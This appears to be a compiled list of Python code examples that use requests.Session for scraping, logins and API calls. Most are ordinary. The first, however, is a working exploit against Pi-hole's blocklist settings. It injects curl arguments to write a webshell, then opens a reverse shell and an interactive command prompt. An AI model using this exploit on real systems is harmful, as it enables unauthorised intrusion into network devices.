Example #1
def exploit(session: requests.Session) -> None:
    print(
        f"[+] Got session-cookie: PHPSESSID={session.cookies.get_dict()['PHPSESSID']}"
    )

    # Get CSRF token from the blocklists settings page
    html = session.get(url=f"{url}settings.php?tab=blocklists",
                       proxies=proxy).text
    soup = BeautifulSoup(html, 'html.parser')
    token = soup.find("input", {'name': 'token'})['value']

    # Stage 1: Trigger connection to our server
    payload = f'http://{get_ip()}# -o ex.php -d "'
    data = {
        'newuserlists': payload,
        'token': token,
        'field': 'adlists',
        'submit': 'saveupdate'
    }
    session.post(url=f"{url}settings.php?tab=blocklists",
                 data=data,
                 proxies=proxy)

    # Setup http server
    http = Process(target=setup_http)
    http.daemon = True
    http.start()

    # Trigger access & file write
    for _ in range(2):
        session.get(url=f"{url}scripts/pi-hole/php/gravity.sh.php",
                    proxies=proxy)

    # Verify webshell
    if verify_webshell():
        print("[+] Webshell uploaded successfully!")
        rev_shell()
        try:
            while True:
                cmd = input("cmd> ")
                # NOTE: exec here is presumably a helper defined elsewhere in
                # the script that runs cmd through the webshell; the builtin
                # exec() would always print None.
                print(exec(cmd))
        except KeyboardInterrupt:
            quit()
        except Exception:
            raise
    else:
        raise Exception("Webshell not uploaded!")
Example #2
    def get_recent_news_articles(session: requests.Session) -> List[Dict[str, str]]:
        """
        Fetches the most recent news articles for the logged in player

        :param session: The requests session initialized by the ComunioSession
        :return: List of article dictionaries with the following attributes:
                    - date:    The article's date
                    - type:    The type of the article, e.g. 'transfers'
                    - content: The article's content
        """
        html = session.get("http://www.comunio.de/team_news.phtml").text
        soup = BeautifulSoup(html, "html.parser")

        article_headers = soup.select(".article_header1") + soup.select(".article_header2")
        article_content = soup.select(".article_content1") + soup.select(".article_content2")

        articles = []

        for header_tag, content_tag in zip(article_headers, article_content):
            header = header_tag.text.strip()
            content = content_tag.text.strip()

            article = {
                "date": header.split(" ", 1)[0],
                "type": header.split(" > ", 1)[1],
                "content": content
            }

            articles.append(article)

        return articles
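A usage sketch for the method above, assuming session is the authenticated requests.Session produced by the ComunioSession mentioned in the docstring:

for article in get_recent_news_articles(session):
    print("{} [{}]: {}".format(article["date"], article["type"], article["content"]))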
Example #3
def _connect(url: str, data: Optional[str] = None, headers: Optional[dict] = None,
             auth=None, session: requests.Session = __SESSION) -> requests.Response:
    """
    :param url: url
    :type url: :class:`str`
    :param data: data to post
    :type data: :class:`str`
    :param headers: headers to send
    :type headers: :class:`dict` or :class:`None`
    :param auth: the authentication to use for the session.
    :type auth: :class:`requests.auth.HTTPBasicAuth`
    :param session: the session to use; defaults to the module-level session.
    :type session: :class:`requests.Session`

    :return: the response of the connection
    :rtype: :class:`requests.Response`
    """
    if headers is None:
        headers = dict()

    url = url_fixer(url)

    headers['User-Agent'] = consts.USER_AGENT
    if data is not None:
        sock = session.post(url, data=data, headers=headers, auth=auth)
    else:
        sock = session.get(url, headers=headers, auth=auth)
    return sock
Example #4
File: main.py  Project: Westwood-S/its
def get_authentication_data(s: requests.Session, contract_number: str):
    data = s.get(url='http://cn.its.glo-ots.cn/ITS_EXPORT_AUTHENTICATION.asp'
                     '?contractid={}&op=0'.format(contract_number))
    data.encoding = 'gbk'
    soup = BeautifulSoup(data.text, "lxml")

    data_dict = {}
    info_dict = {}
    cargo_list = []
    tables = soup.find_all('table')

    trs = tables[8].find_all('tr')
    tds = trs[1].find_all('td')
    info_dict['目的港'] = tds[0].contents[0].strip()
    info_dict['状态'] = tds[1].find('p').contents[0].strip()
    info_dict['一般原产地证书'] = tds[2].find('p').contents[0].strip()
    info_dict['普惠制原产地证书'] = tds[3].contents[0].strip()
    info_dict['认证费用'] = tds[4].contents[0].strip()

    for tr in tables[11].find_all('tr')[1:]:  # skip the header row
        tds = tr.find_all('td')
        cargo_dict = {}
        cargo_dict['货号'] = tds[0].find('a').contents[0].strip()
        cargo_dict['品名'] = tds[1].contents[0].strip()
        cargo_dict['数量'] = tds[2].contents[0].strip()
        cargo_dict['件数'] = tds[3].contents[0].strip()
        cargo_dict['毛重'] = tds[4].contents[0].strip()
        cargo_list.append(cargo_dict)

    data_dict["货物信息"] = cargo_list
    data_dict['检验程序'] = info_dict

    return data_dict
Example #5
def get_captcha(session: requests.Session):
    image_data = session.get(url=CAPTCHA_IMAGE_URL, timeout=TIMEOUT)
    io_file = io.BytesIO(image_data.content)
    image = Image.open(io_file)
    image.show()

    return io_file
Example #6
def get_sysconf(s: requests.Session, page: str, act: str, params: dict):
    return s.get(url=sysconf,
                 params=dict({
                     "page": page,
                     "action": act
                 }, **params),
                 verify=False)
Example #7
def fetch_page(*, url: str, session: requests.Session):
    req = session.get(url)
    body = req.text

    if not req.from_cache:
        # stderr('sleep 5')
        time.sleep(5)

    interactive_warning = '<title>Interactive Stories Are Temporarily Unavailable</title>'
    while interactive_warning in body:
        sleep_for_url(url)
        cache_backend.delete_url(url)
        req = session.get(url)
        body = req.text

    return body
Example #8
def execute_http_call(method, url, params, retry, timeout, apiKey,
                      apiKeyPrefix):
    """
    Executes an HTTP call using the requests library
    Parameters
    ----------
    method : str
    url : str
    params : dict
    retry : Retry
    timeout : tuple
    apiKey : str
    apiKeyPrefix : str
    Returns
    -------
    Response
    """
    # set session
    session = Session()
    session.mount('https://',
                  HTTPAdapter(max_retries=retry))  # Documented in HTTPAdapter
    session.headers = {
        'Authorization': '{} {}'.format(apiKeyPrefix, apiKey),
        'Content-Type': 'application/json',
        'User-Agent': generate_user_agent(),
    }

    if method is "GET":
        response = session.get(url, params=params, timeout=timeout)
    elif method is "POST":
        response = session.post(url, json=params, timeout=timeout)
    else:
        raise NotImplementedError()

    return response
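A minimal usage sketch; the endpoint, key, and prefix are placeholders, and Retry is the urllib3 class consumed by HTTPAdapter above:

from urllib3.util.retry import Retry

retry = Retry(total=3, backoff_factor=0.5, status_forcelist=[429, 500, 502, 503])
response = execute_http_call(
    method="GET",
    url="https://api.example.com/v1/items",  # placeholder endpoint
    params={"page": 1},
    retry=retry,
    timeout=(3.05, 27),  # (connect, read) in seconds
    apiKey="YOUR_KEY",
    apiKeyPrefix="Bearer",
)
print(response.status_code)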
Example #9
File: audit.py  Project: Ben0p/mine-monitor
def getInspections(after: datetime, session: requests.Session, headers: dict):
    '''
    Get all inspections modified after the given ISO datetime
    '''
    query = f"https://api.safetyculture.io/audits/search?field=audit_id&field=modified_at&modified_after={after}Z"
    results = session.get(query, headers=headers)
    results = results.json()
    return results
Example #10
def downloader(session: requests.Session, url: str, filename: str, **kwargs):
    with session.get(url, stream=True, **kwargs) as r:
        if r.status_code == 200:
            r.raw.decode_content = True
            with open(filename, "wb") as f:
                shutil.copyfileobj(r.raw, f)
        else:
            raise Exception(f"Failed to download {url}: HTTP {r.status_code}")
Example #11
def get_sysconf_with_sid_header(s: requests.Session, page: str, act: str,
                                params: dict):
    return s.get(url=sysconf,
                 params=dict({
                     "page": page,
                     "action": act
                 }, **params),
                 verify=False,
                 headers={"sid": s.cookies.get("sid")})
Example #12
async def checkPages(s: requests.Session):
    for url, expected in zip(urlList, urlResultlist):
        res1 = s.get(url=url, allow_redirects=False)
        if expected not in res1.text:
            print(res1.text)
            with open("page.html", 'w', encoding="utf-8") as f:
                f.write(res1.text)
            return False
    return True
Example #13
def get_locations(s: requests.Session) -> list:
    ''' 
    Retrieve latest locations from API
    '''
    ims_locations_url = f'https://{env.ims_ip}/api/location_stats/latest_by_asset/?format=json&limit=100000'
    locations = s.get(ims_locations_url, verify=False)
    locations = locations.json()
    return locations
Example #14
async def loadPages(s: requests.Session):
    for url, regex in zip(urlList, regexList):
        res1 = s.get(url)
        res = re.search(regex, res1.text).group(1)
        print(url)
        print(res)
        print()
        print()
        print()
        urlResultlist.append(res)
Example #15
    def get_own_player_list(session: requests.Session) -> List[Dict[str, Union[str, int]]]:
        """
        Creates dictionaries modelling the user's current players and returns them
        in a list.

        The format of these dictionaries is:

        name:     The player's name
        value:    The player's current value
        points:   The player's currently accumulated performance points
        position: The player's position

        :param session: The requests session initialized by the ComunioSession
        :return:  A list of the user's players as dictionaries
        """
        player_list = []

        sell_html = session.get("http://www.comunio.de/putOnExchangemarket.phtml")
        on_sale_html = session.get("http://www.comunio.de/exchangemarket.phtml?takeplayeroff_x=22")
        soups = (BeautifulSoup(sell_html.text, "html.parser"), BeautifulSoup(on_sale_html.text, "html.parser"))

        for i, soup in enumerate(soups):
            players = soup.select(".tr1") + soup.select(".tr2")

            for player in players:

                attrs = player.select("td")
                if i == 0:
                    player_info = {"name": attrs[0].text.strip(),
                                   "value": int(attrs[2].text.strip().replace(".", "")),
                                   "points": int(attrs[3].text.strip()),
                                   "position": attrs[4].text.strip()}
                elif i == 1:
                    player_info = {"name": attrs[1].text.strip(),
                                   "value": int(attrs[4].text.strip().replace(".", "")),
                                   "points": int(attrs[5].text.strip()),
                                   "position": attrs[7].text.strip()}
                else:
                    player_info = {}
                player_list.append(player_info)

        return player_list
Example #16
def login(session: requests.Session,
          account: str,
          password: str,
          captcha_code=None,
          save_captcha=False):
    """Login to Mo Online.

    Arguments:
        session {requests.Session} -- requests session.
        account {str} -- game account.
        password {str} -- game password.
        captcha_code {str} -- captcha code; prompted for on stdin if None.

    Raises:
        LoginError:
            description: error_type
            server_error: Server timeout or error
            account_error: User password or account error
            captcha_error:  captcha code error.
    Returns:
        [str] -- game login url. (moop)
    """
    page = session.get(url=LOGIN_URL, timeout=TIMEOUT)
    if not isinstance(captcha_code, str):
        get_captcha(session)
        captcha_code = input("input captcha code: ")
    login_data = {
        'loginAccount': account,
        'loginPassword': password,
        'loginCode': captcha_code,
        'contract1': 'on',
        'contract2': 'on',
        'contract3': 'on',
        **csrf_parse(page.text)
    }

    post_login = session.post(url=LOGIN_URL, timeout=TIMEOUT, data=login_data)

    if post_login.url == START_GAME_URL and post_login.status_code == 200:
        _base_index = post_login.text.find('window.location.href') + 24
        _end_index = post_login.text.find('"', _base_index + 1)
        return post_login.text[_base_index:_end_index]

    elif post_login.text.find("密碼錯誤") > -1:
        raise LoginError(error_type='account_error',
                         account=account,
                         message="account or password wrong.")
    elif post_login.text.find("驗證碼輸入不正確") > -1:
        raise LoginError(error_type='captcha_error',
                         account=account,
                         message="captcha code error.")

    raise Exception("Unexpected login response.")
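A usage sketch showing the documented error handling; the account and password are placeholders, and this assumes LoginError keeps its keyword arguments as attributes:

import requests

session = requests.Session()
try:
    game_url = login(session, account="player1", password="secret")
    print("login ok:", game_url)
except LoginError as ex:
    print("login failed:", ex.error_type)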
Example #17
def check_is_student(s: requests.Session) -> bool:
    """Check whether the user is a student.

    Args:
        s (requests.Session): session

    Returns:
        bool: True if the user is a student
    """
    url = s.get("https://www.zhixue.com/container/container/index/").url
    return "student" in url
Example #18
def getHTMLText(url: str, rssion: requests.Session) -> str:
    try:
        resp = rssion.get(url, headers=PttInfo.headers)
        resp.raise_for_status()
        resp.encoding = resp.apparent_encoding
        return resp.text
    except requests.RequestException as ex:
        # resp may be unbound if get() itself raised, so report the exception
        print("url: " + url)
        print("error: " + str(ex))
        return "error resp"
Example #19
def get_role(s: requests.Session) -> str:
    """
    Get the current user's role.
    :param s: session
    :return: the user's role
    """
    r = s.get("https://www.zhixue.com/apicourse/web/getCurrentUser")
    data = r.json()
    if data["errorCode"] != 0:
        raise Exception(data["errorInfo"])
    return data["result"]["currentUser"]["role"]
Example #20
def fetch_ads(session: Session) -> Set[AdModel]:
    url = build_url()
    ads = []

    logger.info('=== Starting fetch ads ===')

    response = session.get(url)
    if response.status_code != 200:
        logger.critical(
            '=== Unsuccessful attempt. '
            'Please check url - %s '
            'The script will be stopped ===', url)
        raise RequestsConnectionError(
            f'Unable to get urls {response.status_code}')

    soup = BeautifulSoup(response.content.decode('utf-8'), 'lxml')
    ads_items = soup.find_all('table', attrs={'summary': 'Объявление'})

    logger.info('=== Start processing %s ads ===', len(ads_items))
    for item in ads_items:

        item_url_obj = item.find('a', class_='marginright5')
        item_url, url_info, *_ = item_url_obj.attrs.get('href').split('#')

        if not settings.WITH_PROMOTED and 'promoted' in url_info:
            continue

        try:
            price = int(
                item.find(
                    'p',
                    class_='price').text.split(' грн.')[0].strip().replace(
                        ' ', ''))
        except ValueError:
            logger.exception('=== Error during parsing a price ===')
            continue

        day = item.select('small > span')[1].text.strip().split(' ')[0].lower()

        ad = AdModel(
            external_id=item.attrs.get('data-id'),
            title=item_url_obj.text.strip(),
            price=price,
            url=item_url,
        )

        if day in settings.PUBLICATION_DATE and \
                settings.MIN_PRICE <= ad.price <= settings.MAX_PRICE:
            ads.append(ad)

    result = set(ads)
    logger.info('=== Found %s ads after filtering ===', len(result))
    return result
Example #21
def get_ip(session: requests.Session, raw_url: str):
    url = make_ipaddress_url(raw_url)
    try:
        rs = session.get(url, timeout=5)
        pattern = r"\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b"
        ip_list = re.findall(pattern, rs.text)
        ip_counter_obj = Counter(ip_list).most_common(1)
        if ip_counter_obj:
            return raw_url, ip_counter_obj[0][0]
        raise Exception("ip address empty")
    except Exception as ex:
        print("get: {}, error: {}".format(url, ex))
        raise
Example #22
def get_captcha(s: requests.Session):
    r = s.get("https://pass.changyan.com/kaptcha.jpg",
              params={
                  "type": "normal",
                  "d": time.time() * 1000
              })
    Image.open(BytesIO(r.content)).save("captcha.png")
    # Use a context manager so the image file handle is closed after upload
    with open("captcha.png", "rb") as img:
        r = requests.post(f"{url}/b",
                          files={
                              'image_file':
                              ('captcha.png', img, 'application')
                          })
    return r.json()["value"]
Example #23
def getHTMLText(url: str, rssion: requests.Session) -> str:
    try:
        headers = {
            'User-Agent':
            'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36'
        }
        resp = rssion.get(url, headers=headers)
        resp.raise_for_status()
        resp.encoding = resp.apparent_encoding
        return resp.text
    except requests.RequestException as ex:
        print("request url: " + url)
        print("error: " + str(ex))
        return "error resp"
Example #24
File: main.py  Project: Westwood-S/its
def get_launchintoinsurance_data(s: requests.Session, contract_number: str):
    data = s.get(url='http://cn.its.glo-ots.cn/its_export_launchintoinsurance.asp'
                     '?contractid=%27{}%27&op=0'.format(contract_number))
    data.encoding = 'gbk'
    soup = BeautifulSoup(data.text, "lxml")

    data_dict = {}
    info_dict = {}
    cargo_list = []
    tables = soup.find_all('table')

    trs = tables[8].find_all('tr')
    tds = trs[1].find_all('td')
    info_dict['船名'] = tds[0].contents[0].strip()
    info_dict['航次'] = tds[1].contents[0].strip()
    info_dict['目的港口'] = tds[2].contents[0].strip()
    info_dict['投保金额'] = tds[3].contents[0].strip()
    info_dict['保险费'] = tds[4].contents[0].strip()
    info_dict['保单号'] = tds[5].contents[0].strip()

    # The cargo table index depends on whether insurance has been arranged yet
    table_idx = 10 if info_dict['保单号'] == '未办理' else 12
    for tr in tables[table_idx].find_all('tr')[1:]:  # skip the header row
        tds = tr.find_all('td')
        cargo_dict = {}
        a = tds[0].find_all('a')
        cargo_dict['货号'] = a[0].contents[0].strip()
        cargo_dict['品名'] = tds[1].contents[0].strip()
        cargo_dict['数量'] = tds[2].contents[0].strip()
        cargo_dict['件数'] = tds[3].contents[0].strip()
        cargo_dict['毛重'] = tds[4].contents[0].strip()
        cargo_list.append(cargo_dict)

    data_dict["货物信息"] = cargo_list
    data_dict['保险信息'] = info_dict

    return data_dict
Example #25
def captcha_solver(captcha_image_url: str, session: requests.Session) -> dict:
    response = session.get(captcha_image_url)
    encoded_string = base64.b64encode(response.content)
    url = "https://api.apitruecaptcha.org/one/gettext"

    data = {
        "userid": TRUECAPTCHA_USERID,
        "apikey": TRUECAPTCHA_APIKEY,
        "case": "mixed",
        "mode": "human",
        "data": str(encoded_string)[2:-1],
    }
    r = requests.post(url=url, json=data)
    return r.json()
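A usage sketch; the captcha URL is a placeholder and TRUECAPTCHA_USERID / TRUECAPTCHA_APIKEY are assumed to be configured elsewhere in the module:

import requests

session = requests.Session()
result = captcha_solver("https://example.com/captcha.jpg", session)
print(result)  # the solved text is typically under the "result" key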
Example #26
def validate_session(session: requests.Session) -> bool:
    # Validate by visiting the settings page; anonymous users are
    # redirected to the login page.
    settings_url = "https://www.zhihu.com/settings/profile"
    verify_rsp = session.get(settings_url)

    if verify_rsp.url != settings_url:
        obsolete_session_file = os.path.join(os.path.dirname(os.path.abspath(__file__)),
                                             SESSION_FILENAME)
        if os.path.exists(obsolete_session_file):
            os.remove(obsolete_session_file)

        raise ValueError("check COOKIE_VALUE in settings.py.")

    return True
Example #27
def retrieve(url):
    session = RequestSession()
    headers = {
        'User-Agent':
        'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.3'
    }
    request = session.get(url, headers=headers)

    if not request.ok:
        return False

    # Return a stream positioned at the beginning, ready for reading
    return BytesIO(request.content)
Example #28
    def try_get_url(cls,
                    session: requests.Session,
                    url: str,
                    *,
                    try_times: int = 3,
                    try_timeout: int = 5,
                    **kwargs) -> Optional[requests.Response]:
        for _ in range(try_times):
            try:
                return session.get(url=url, timeout=try_timeout, **kwargs)
            except (requests.exceptions.ConnectionError,
                    requests.exceptions.ReadTimeout):
                continue
        return None
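A usage sketch, assuming the classmethod above lives on some fetcher class (the Fetcher name is illustrative):

import requests

session = requests.Session()
resp = Fetcher.try_get_url(session, "https://example.com", try_times=5, try_timeout=10)
if resp is None:
    print("all retries failed")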
Example #29
File: audit.py  Project: Ben0p/mine-monitor
def getInspectionDetails(inspections: dict, session: requests.Session,
                         headers: dict):
    '''
    For each inspection, get the details
    '''
    details = []
    for inspection in inspections['audits']:
        results = session.get(
            f"https://api.safetyculture.io/audits/{inspection['audit_id']}",
            headers=headers)
        results = results.json()
        # Convert date time strings to datetime object
        results['created_at'] = datetime.strptime(results['created_at'],
                                                  '%Y-%m-%dT%H:%M:%S.%fZ')
        results['modified_at'] = datetime.strptime(results['modified_at'],
                                                   '%Y-%m-%dT%H:%M:%S.%fZ')
        details.append(results)
    return details
Example #30
File: main.py  Project: Westwood-S/its
def get_shipment_data(s: requests.Session, contract_number: str):

    data = s.get(url='http://cn.its.glo-ots.cn/ITS_EXPORT_SHIPMENT.asp'
                     '?contractid={}&op=0'.format(contract_number))
    data.encoding = 'gbk'
    soup = BeautifulSoup(data.text, "lxml")

    data_dict = {}
    info_dict = {}
    cargo_list = []
    tables = soup.find_all('table')

    trs = tables[8].find_all('tr')
    tds = trs[1].find_all('td')
    info_dict['提单号'] = tds[0].find('p').contents[0].strip()
    info_dict['目的港'] = tds[1].find('p').contents[0].strip()
    info_dict['船名'] = tds[2].contents[0].strip()
    info_dict['航次'] = tds[3].contents[0].strip()
    info_dict['装船日期'] = tds[4].find('p').contents[0].strip()

    trs = tables[9].find_all('tr')
    tds = trs[1].find_all('td')
    info_dict['20FCL海洋运费'] = tds[0].find('p').contents[0].strip()
    info_dict['40FCL海洋运费'] = tds[1].find('p').contents[0].strip()
    info_dict['付费方式'] = tds[2].find('p').contents[0].strip()
    info_dict['20FCL个数'] = tds[3].find('p').contents[0].strip()
    info_dict['40FCL个数'] = tds[4].find('p').contents[0].strip()

    for tr in tables[10].find_all('tr')[1:]:  # skip the header row
        tds = tr.find_all('td')
        cargo_dict = {}
        cargo_dict['货号'] = tds[0].find('a').contents[0].strip()
        cargo_dict['品名'] = tds[1].contents[0].strip()
        cargo_dict['数量'] = tds[2].contents[0].strip()
        cargo_dict['件数'] = tds[3].contents[0].strip()
        cargo_dict['毛重'] = tds[4].contents[0].strip()
        cargo_list.append(cargo_dict)

    data_dict["货物信息"] = cargo_list
    data_dict['装船信息'] = info_dict

    return data_dict
Example #31
def get_servers(sess_id: str, session: requests.Session) -> dict:
    d = {}
    url = "https://support.euserv.com/index.iphp?sess_id=" + sess_id
    headers = {
        "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
                      "Chrome/83.0.4103.116 Safari/537.36",
        "origin": "https://www.euserv.com"
    }
    f = session.get(url=url, headers=headers)
    f.raise_for_status()
    soup = BeautifulSoup(f.text, 'html.parser')
    for tr in soup.select('#kc2_order_customer_orders_tab_content_1 .kc2_order_table.kc2_content_table tr'):
        server_id = tr.select('.td-z1-sp1-kc')
        if not len(server_id) == 1:
            continue
        action_text = tr.select('.td-z1-sp2-kc .kc2_order_action_container')[0].get_text()
        flag = 'Contract extension possible from' not in action_text
        d[server_id[0].get_text()] = flag
    return d
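A usage sketch; the sess_id value is a placeholder for a real EUserv session id:

import requests

with requests.Session() as s:
    servers = get_servers("0123456789abcdef", s)
    for server_id, flag in servers.items():
        print(server_id, flag)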